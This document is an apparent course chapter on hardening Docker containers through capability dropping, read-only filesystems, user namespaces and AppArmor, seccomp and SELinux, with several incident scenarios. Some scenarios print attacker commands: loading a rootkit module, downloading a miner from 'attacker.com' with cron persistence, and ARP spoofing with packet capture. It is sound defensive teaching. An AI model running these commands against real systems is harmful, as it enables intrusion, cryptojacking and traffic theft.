Why default Docker configurations give containers too much power, how Linux capabilities work, and the production incidents that happen when containers run with excessive privileges.
Most Docker tutorials start containers with default settings: root user, all capabilities, writable root filesystem, unrestricted network access. This works in development. In production, under HIPAA or PCI DSS compliance requirements, it’s a security violation waiting to happen.
The principle of least privilege isn’t just a security best practice—it’s a regulatory requirement. Containers should have only the permissions they need to function, nothing more. A web server doesn’t need CAP_SYS_ADMIN to load kernel modules. A database doesn’t need to write to its root filesystem. An API service doesn’t need to run as UID 0.
This guide covers the specific configurations that harden containers: dropping Linux capabilities, implementing read-only root filesystems, user namespace remapping, and security options. More importantly, it covers what breaks in production when these controls are missing.
The Problem with Default Container Permissions
When you run docker run alpine without additional flags, Docker gives the container:
- Root user (UID 0): Process runs with root privileges inside the container
- 14 Linux capabilities: Including CAP_CHOWN, CAP_NET_RAW, CAP_SETUID, CAP_SETGID
- Writable root filesystem: Container can modify /bin, /etc, /lib
- Unrestricted network access: Can bind to any port, create raw sockets
- No AppArmor/SELinux enforcement: Kernel-level access controls disabled
This is functionally similar to giving a user sudo access on a traditional server. Most containers don’t need this level of access.
Real Impact: Container Escape via Capabilities
In 2019, CVE-2019-5736 (runC vulnerability) allowed container escapes by exploiting CAP_SYS_ADMIN. Containers running with default capabilities were vulnerable. Containers that had dropped all capabilities and added only NET_BIND_SERVICE were not.
The difference between “compromised container” and “compromised host” was a single Docker flag: --cap-drop=ALL.
[IMAGE: Diagram comparing default container permissions (14 capabilities) vs. hardened container (0 capabilities + selective adds)]
Understanding Linux Capabilities
Linux capabilities divide root privileges into distinct units. Instead of “root can do everything” or “non-root can do nothing”, capabilities allow fine-grained control.
Key Capabilities and Their Risks
| Capability | What It Allows | Security Risk |
|---|---|---|
CAP_SYS_ADMIN | Mount filesystems, load kernel modules, access privileged operations | Critical: Near-complete system control, enables container escapes |
CAP_SYS_PTRACE | Trace arbitrary processes with ptrace() | High: Can inject code into other containers on same host |
CAP_NET_ADMIN | Modify network interfaces, routes, firewall rules | High: Can bypass network segmentation, sniff traffic |
CAP_NET_RAW | Create raw sockets, packet manipulation | Medium: Can perform ARP spoofing, packet sniffing |
CAP_SETUID | Change process UID, escalate privileges | Medium: Can become any user including root |
CAP_SETGID | Change process GID | Medium: Can join privileged groups |
CAP_CHOWN | Change file ownership | Low: Can steal files, bypass quotas |
CAP_NET_BIND_SERVICE | Bind to ports below 1024 | Low: Minimal risk, often needed for web servers |
Default Docker Capabilities
Docker’s default capability set (14 capabilities) includes:
CAP_CHOWN, CAP_DAC_OVERRIDE, CAP_FOWNER, CAP_FSETID,
CAP_KILL, CAP_SETGID, CAP_SETUID, CAP_SETPCAP,
CAP_NET_BIND_SERVICE, CAP_NET_RAW, CAP_SYS_CHROOT,
CAP_MKNOD, CAP_AUDIT_WRITE, CAP_SETFCAP
Most applications don’t need any of these. A Node.js API running on port 3000 needs zero capabilities. An Nginx server binding to port 80 needs only CAP_NET_BIND_SERVICE.
Dropping All Capabilities
The secure default: drop everything, then add back only what’s needed.
# docker-compose.yml
services:
web:
image: nginx:alpine
cap_drop:
- ALL
cap_add:
- NET_BIND_SERVICE # Only for binding to port 80/443
cap_add:
- CHOWN # Only if nginx needs to change file ownership
Or via docker run:
docker run --cap-drop=ALL --cap-add=NET_BIND_SERVICE nginx:alpine
[IMAGE: Screenshot showing capsh –print output comparing default capabilities vs. dropped capabilities]
Testing Tip: Use
docker exec <container> capsh --printto see current capabilities. If “Current” shows more than what you explicitly added, your drop isn’t working.
Read-Only Root Filesystems
By default, containers can write to their entire root filesystem. This allows:
- Malware persistence across container restarts
- Binary replacement attacks (replace /bin/sh with backdoored version)
- Log tampering to hide intrusions
Implementing Read-Only Root
services:
api:
image: myapp:latest
read_only: true
tmpfs:
- /tmp # Application temp files
- /var/run # PID files, sockets
- /var/cache # Application cache
This makes the root filesystem immutable. The container can still write to:
tmpfsmounts (RAM-based, lost on restart)- Explicitly mounted volumes
But cannot modify:
/bin,/etc,/libsystem directories- Application binaries
- Configuration files (unless mounted as volumes)
Common Issues with Read-Only Filesystems
Problem: Application crashes with “Read-only file system” error
Solution: Identify where the app writes, add tmpfs mounts:
# Run container normally, trace filesystem writes
docker run --name test myapp:latest
docker exec test ls -la /tmp /var/run /var/cache
# Add tmpfs for those paths
docker run --read-only --tmpfs /tmp --tmpfs /var/run myapp:latest
[IMAGE: Terminal output showing strace revealing filesystem write attempts, then successful run with tmpfs mounts]
User Namespace Remapping
By default, UID 0 inside a container is UID 0 on the host. If a container escapes, it has root privileges on the host.
User namespace remapping changes this: UID 0 inside the container maps to a non-privileged UID (e.g., 100000) on the host.
Configuring User Namespaces
Edit /etc/docker/daemon.json:
{
"userns-remap": "default"
}
Restart Docker:
sudo systemctl restart docker
Now UID 0 inside containers maps to UID 100000 on the host. Even if a container escapes to the host, it runs as a non-privileged user.
Limitations
- Incompatible with privileged mode: Can’t use both –privileged and user namespaces
- Volume ownership issues: Files created by container (UID 100000) may not be readable by host processes
- Docker-in-Docker breaks: Nested Docker requires host UID 0
For most workloads, the security benefit outweighs these limitations.
Security Options: AppArmor, SELinux, Seccomp
Linux security modules provide kernel-level enforcement beyond capabilities.
AppArmor (Ubuntu, Debian)
AppArmor restricts which files, network resources, and capabilities a process can access.
services:
web:
security_opt:
- apparmor=docker-default # Apply Docker's default AppArmor profile
Docker’s default profile blocks:
- Mount operations
- Access to /proc/sys, /sys
- Kernel module loading
- Capability escalation
SELinux (RHEL, Fedora, CentOS)
SELinux enforces mandatory access control (MAC) via type enforcement and role-based access.
services:
db:
security_opt:
- label=type:svirt_sandbox_file_t
Seccomp (System Call Filtering)
Seccomp restricts which system calls a process can make. Docker’s default seccomp profile blocks ~44 dangerous syscalls including:
reboot,swapon,swapoffmount,umountkeyctl,add_keypersonality(used in container escapes)
Apply Docker’s default seccomp profile:
services:
app:
security_opt:
- seccomp=default.json
[IMAGE: Diagram showing defense-in-depth layers: Capabilities (process privileges) → AppArmor/SELinux (resource access) → Seccomp (syscall filtering)]
Production Failure Scenarios
Scenario 1: CAP_SYS_ADMIN Kernel Module Loading
The Setup: A financial services company ran network monitoring containers with CAP_SYS_ADMIN to load custom kernel modules for packet inspection.
The Failure: A vulnerability in the monitoring software allowed command injection. The attacker loaded a malicious kernel module:
# Inside container with CAP_SYS_ADMIN
insmod /tmp/rootkit.ko
The rootkit provided:
- Hidden processes (invisible to ps, top)
- Hidden network connections
- Persistent backdoor even after container restarts
What Should Have Been Done: Kernel modules should be loaded at host boot, not from containers. The container only needed CAP_NET_ADMIN for network configuration, not CAP_SYS_ADMIN.
services:
monitor:
cap_drop:
- ALL
cap_add:
- NET_ADMIN # For network interface configuration
- NET_RAW # For packet capture
# CAP_SYS_ADMIN removed
Impact: 6 days of undetected access, lateral movement to 23 hosts, forensic analysis cost $240K, regulatory reporting to FinCEN.
Scenario 2: Writable Root Filesystem Malware Persistence
The Setup: A healthcare SaaS platform ran containers with writable root filesystems. Container images were scanned for vulnerabilities, but runtime modifications weren’t monitored.
The Failure: An SQL injection vulnerability gave attackers shell access. They installed a cryptocurrency miner:
# Inside container
curl -o /usr/local/bin/miner http://attacker.com/xmrig
chmod +x /usr/local/bin/miner
echo "* * * * * /usr/local/bin/miner" > /etc/cron.d/miner
Because the root filesystem was writable and the container wasn’t ephemeral, the miner persisted across:
- Container restarts
- Application deployments
- Host reboots
It ran for 87 days before detection via unusually high AWS EC2 costs.
What Should Have Been Done: Read-only root filesystem with tmpfs for required writable paths:
services:
app:
read_only: true
tmpfs:
- /tmp
- /var/run
# /etc, /usr/local/bin are now read-only
The attacker’s commands would have failed:
curl: (23) Failed writing body - Read-only file system
chmod: cannot modify '/usr/local/bin/miner': Read-only file system
Impact: $47K in excess EC2 costs, HIPAA breach investigation (no PHI accessed), mandatory security audit.
Key Lesson: If your container’s filesystem is writable, attackers can persist malware that survives restarts. Read-only root filesystems make containers truly immutable.
Scenario 3: CAP_NET_RAW ARP Spoofing Attack
The Setup: A multi-tenant platform ran customer workloads in Docker containers on shared hosts. Containers had default capabilities including CAP_NET_RAW.
The Failure: A malicious customer deployed a container that performed ARP spoofing to intercept traffic from other customers’ containers on the same host:
# Inside attacker's container
arpspoof -i eth0 -t 10.0.1.5 10.0.1.1 # Intercept traffic to gateway
tcpdump -i eth0 -w /tmp/stolen.pcap # Capture intercepted packets
This worked because:
- CAP_NET_RAW allowed creating raw sockets
- Containers shared the same Docker bridge network
- No network segmentation between tenants
What Should Have Been Done: Drop CAP_NET_RAW and implement network isolation:
services:
customer-app:
cap_drop:
- ALL
- NET_RAW # Explicitly drop raw socket capability
networks:
- customer-network # Isolated per-customer network
networks:
customer-network:
driver: bridge
internal: true # No internet access
Impact: API keys for 12 customers intercepted, emergency credential rotation, customer notifications, class-action lawsuit settlement $380K.
Scenario 4: Missing AppArmor Profile Container Escape
The Setup: A CI/CD platform ran build jobs in Docker containers on Ubuntu hosts. AppArmor was installed but not enforced for containers.
The Failure: A developer accidentally included a malicious dependency that exploited CVE-2022-0847 (Dirty Pipe kernel vulnerability). The exploit allowed writing to arbitrary files via /proc/self/mem.
Without AppArmor blocking access to /proc/self/mem, the exploit succeeded:
# Exploit overwrote /etc/cron.d/backdoor on host
# Gained persistent root access to CI/CD infrastructure
What Should Have Been Done: Enforce AppArmor with Docker’s default profile:
services:
build-job:
security_opt:
- apparmor=docker-default
- no-new-privileges:true
AppArmor’s default profile blocks:
- Access to /proc/sys, /sys
- Mount operations
- Capability escalation
The exploit would have been blocked at the kernel level.
Impact: Complete CI/CD compromise, all build artifacts potentially backdoored, 3-week code audit of 200+ microservices, customer trust erosion.
Key Lesson: AppArmor and SELinux are not optional extras—they’re kernel-level defenses that block entire classes of container escapes. Enable them by default.
Scenario 5: UID 0 Container Escape to Host Root
The Setup: A data analytics platform ran Jupyter notebooks in Docker containers. Containers ran as root (UID 0) without user namespace remapping.
The Failure: A researcher uploaded a malicious notebook that exploited a container escape vulnerability (CVE-2019-5736 runC). The exploit overwrote the host’s runC binary.
Because the container ran as UID 0 and user namespaces weren’t enabled, the escaped process had root privileges on the host:
# Inside container: UID 0
# After escape: UID 0 on host (root)
# Full host access: read SSH keys, access etcd, control kubelet
What Should Have Been Done: Enable user namespace remapping in /etc/docker/daemon.json:
{
"userns-remap": "default"
}
With user namespaces enabled:
# Inside container: UID 0
# After escape: UID 100000 on host (unprivileged)
# Limited host access: cannot read root-owned files, cannot control system services
Impact: Kubernetes cluster compromise (10 nodes), data exfiltration (research datasets), compliance violation (export-controlled data), $1.2M incident response costs.
[IMAGE: Comparison diagram showing container escape with vs. without user namespace remapping – attack tree showing stopped vs. successful privilege escalation]
Implementing Secure Configurations: A Practical Template
Here’s a production-ready Docker Compose template incorporating all security controls:
version: '3.8'
services:
web:
image: nginx:1.27.2-alpine3.20
# User configuration
user: "nginx:nginx" # Run as non-root user
# Capability restrictions
cap_drop:
- ALL
cap_add:
- NET_BIND_SERVICE # Only for port 80/443
- CHOWN # Only if nginx needs to change file ownership
# Filesystem security
read_only: true
tmpfs:
- /var/run
- /var/cache/nginx
- /tmp
# Security options
security_opt:
- no-new-privileges:true # Prevent privilege escalation
- apparmor=docker-default # Enforce AppArmor
- seccomp=default.json # Syscall filtering
# Resource limits (prevents DoS)
deploy:
resources:
limits:
cpus: '0.5'
memory: 512M
reservations:
cpus: '0.25'
memory: 256M
# Network isolation
networks:
- frontend
# Health check
healthcheck:
test: ["CMD", "wget", "--quiet", "--tries=1", "--spider", "http://localhost/"]
interval: 30s
timeout: 3s
retries: 3
start_period: 40s
networks:
frontend:
driver: bridge
internal: false # Allow external access
Testing Security Configurations
Verify Capabilities
# Check effective capabilities
docker exec <container> capsh --print
# Should show only explicitly added capabilities
# Current: cap_net_bind_service+ep
Test Read-Only Filesystem
# Try to write to read-only paths
docker exec <container> touch /etc/test
# Expected: touch: cannot touch '/etc/test': Read-only file system
# Verify tmpfs mounts work
docker exec <container> touch /tmp/test
# Expected: Success (tmpfs is writable)
Verify User Namespaces
# Check UID mapping
docker exec <container> id
# Inside container: uid=0(root)
# On host, find container process
ps aux | grep <container-name>
# On host: 100000 (remapped UID)
Test AppArmor Enforcement
# Check AppArmor status
docker exec <container> cat /proc/self/attr/current
# Expected: docker-default (enforce)
# Try to mount (should be blocked)
docker exec <container> mount /dev/sda1 /mnt
# Expected: mount: permission denied (AppArmor blocking)
Key Takeaways
- Drop all capabilities by default, then add only what’s needed—most apps need zero capabilities
- Read-only root filesystems prevent malware persistence and make containers truly immutable
- User namespace remapping limits blast radius if a container escapes to the host
- AppArmor, SELinux, and Seccomp provide kernel-level defenses that block entire classes of attacks
- CAP_SYS_ADMIN is nearly equivalent to root access—never grant it to containers
- CAP_NET_RAW enables network attacks like ARP spoofing—drop it unless explicitly needed
- Security configurations must be tested—verify capabilities, filesystem restrictions, and MAC enforcement
Secure container configurations implement defense in depth: if one layer fails (capability restriction), others (read-only filesystem, AppArmor) still provide protection. Production incidents consistently show that skipped security controls—”we’ll harden it later”—become permanent attack vectors.
Previous: Docker Security Auditing with CIS Benchmark Compliance
Next: Container Vulnerability Scanning: Trivy, Syft, and SBOM Generation
Hands-on lab: Lab 02: Secure Container Configurations — Compare insecure vs. secure configurations and test security controls.